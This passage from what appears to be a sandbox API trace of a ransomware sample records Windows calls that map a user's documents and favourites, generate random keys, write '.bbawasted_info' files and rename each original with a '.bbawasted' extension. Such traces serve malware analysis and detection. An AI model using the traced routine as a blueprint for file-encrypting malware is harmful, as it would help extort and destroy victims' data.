hTemplateFile=0x0) returned 0xfc [0072.276] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0072.276] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x13ba1 [0072.276] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13ba1) returned 0xfe0000 [0072.276] CloseHandle (hObject=0xfc) returned 1 [0072.280] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.281] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.281] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.281] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.281] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0072.281] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.290] SetEndOfFile (hFile=0x120) returned 1 [0072.292] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca680 | out: hHeap=0x580000) returned 1 [0072.292] CloseHandle (hObject=0x120) returned 1 [0072.293] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5be7e0 | out: hHeap=0x580000) returned 1 [0072.293] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2f80 | out: hHeap=0x580000) returned 1 [0072.293] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.294] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.294] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.294] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z3o6OXIuDCyf.odt") returned 60 [0072.294] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x282) returned 0x5abbd8 [0072.294] lstrcpyW (in: lpString1=0x5abc50, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.294] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5ca680 [0072.294] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.295] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5ca680 | out: pbBuffer=0x5ca680) returned 1 [0072.295] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z3o6OXIuDCyf.odt.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z3o6oxiudcyf.odt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.295] WriteFile (in: hFile=0x120, lpBuffer=0x5ca680*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5ca680*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.296] SetEndOfFile (hFile=0x120) returned 1 [0072.296] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.296] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ca680 | out: hHeap=0x580000) returned 1 [0072.296] lstrcpyW (in: lpString1=0x5abc50, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.297] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z3o6OXIuDCyf.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z3o6oxiudcyf.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z3o6OXIuDCyf.odt.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z3o6oxiudcyf.odt.bbawasted")) returned 1 [0072.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\z3o6OXIuDCyf.odt.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\z3o6oxiudcyf.odt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.297] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.297] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x84f0 [0072.297] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x84f0) returned 0x570000 [0072.297] CloseHandle (hObject=0x11c) returned 1 [0072.300] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.301] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.301] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.301] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.301] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0072.301] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.388] SetEndOfFile (hFile=0x120) returned 1 [0072.428] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0072.428] CloseHandle (hObject=0x120) returned 1 [0072.431] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5abbd8 | out: hHeap=0x580000) returned 1 [0072.431] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ceb50 | out: hHeap=0x580000) returned 1 [0072.431] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.432] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.432] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.432] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0072.432] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x298) returned 0x5bf070 [0072.432] lstrcpyW (in: lpString1=0x5bf0fe, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.432] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0072.432] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.434] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0072.434] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.434] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.438] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.439] SetEndOfFile (hFile=0x120) returned 1 [0072.439] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.439] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0072.439] lstrcpyW (in: lpString1=0x5bf0fe, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.439] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.bbawasted")) returned 1 [0072.440] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.440] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.440] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xe2 [0072.440] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe2) returned 0x570000 [0072.440] CloseHandle (hObject=0x110) returned 1 [0072.442] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.442] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.443] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.443] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.443] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0072.443] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.452] SetEndOfFile (hFile=0x120) returned 1 [0072.454] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0072.454] CloseHandle (hObject=0x120) returned 1 [0072.455] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0072.455] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c76c8 | out: hHeap=0x580000) returned 1 [0072.455] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.456] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.456] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.456] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 81 [0072.456] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ac) returned 0x5bf070 [0072.456] lstrcpyW (in: lpString1=0x5bf112, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.456] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0072.456] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.457] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0072.457] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.458] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.459] SetEndOfFile (hFile=0x120) returned 1 [0072.459] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.459] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0072.459] lstrcpyW (in: lpString1=0x5bf112, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.459] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.bbawasted")) returned 1 [0072.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.460] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0072.460] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x85 [0072.460] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x570000 [0072.461] CloseHandle (hObject=0xfc) returned 1 [0072.465] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.465] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.466] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.466] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.466] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0072.466] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.475] SetEndOfFile (hFile=0x120) returned 1 [0072.477] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0072.477] CloseHandle (hObject=0x120) returned 1 [0072.479] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0072.479] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c0f50 | out: hHeap=0x580000) returned 1 [0072.479] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.480] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.480] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.480] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0072.480] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2c0) returned 0x5bf070 [0072.480] lstrcpyW (in: lpString1=0x5bf126, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.480] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0072.480] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.481] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0072.481] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.481] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.482] SetEndOfFile (hFile=0x120) returned 1 [0072.482] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.482] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0072.483] lstrcpyW (in: lpString1=0x5bf126, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.483] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.bbawasted")) returned 1 [0072.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.483] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.483] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x85 [0072.484] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x570000 [0072.484] CloseHandle (hObject=0x110) returned 1 [0072.485] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.486] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.486] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.486] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.487] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0072.487] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.495] SetEndOfFile (hFile=0x120) returned 1 [0072.607] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0072.607] CloseHandle (hObject=0x120) returned 1 [0072.714] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0072.714] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c02c8 | out: hHeap=0x580000) returned 1 [0072.714] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.715] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.715] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.715] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0072.715] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b2) returned 0x5bf070 [0072.715] lstrcpyW (in: lpString1=0x5bf118, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.715] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0072.715] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.716] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0072.716] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.716] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.717] SetEndOfFile (hFile=0x120) returned 1 [0072.718] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.718] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0072.718] lstrcpyW (in: lpString1=0x5bf118, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.718] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.bbawasted")) returned 1 [0072.718] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.718] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0072.719] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x85 [0072.719] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x570000 [0072.719] CloseHandle (hObject=0x110) returned 1 [0072.721] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.721] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.721] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.721] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.722] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 